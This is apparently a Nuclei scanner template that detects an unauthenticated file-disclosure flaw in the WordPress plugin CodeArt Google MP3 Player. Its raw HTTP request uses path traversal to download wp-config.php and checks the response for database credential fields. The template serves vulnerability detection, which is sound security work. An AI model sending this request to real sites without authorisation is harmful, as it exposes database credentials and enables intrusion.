id: wp-googlemp3-lfi

info:
  name: WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download
  author: theamanrawat
  severity: critical
  description: |
    WordPress Plugin CodeArt Google MP3 Player allows an unauthenticated attacker to download file from server.
  reference:
    - https://www.exploit-db.com/exploits/35460
    - https://wordpress.org/plugins/google-mp3-audio-player/
  metadata:
    verified: "true"
    max-request: 1
    publicwww-query: "/wp-content/plugins/google-mp3-audio-player/"
  tags: wp-plugin,wp,wordpress,lfi,google-mp3-audio-player,unauth,disclosure

http:
  - raw:
      - |
        GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../wp-config.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_USER"
          - "DB_PASSWORD"
          - "DB_HOST"
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200

# digest: 4a0a004730450221008c610db40cc039edb35bcb96d13cc7266734a3597e6202fdc98309f3570a845e02201340968b65d7fba83ad5e4a80ffbe5b0193193f46f329d3b259c795f14eb7022:922c64590222798bb761d5b6d8e72950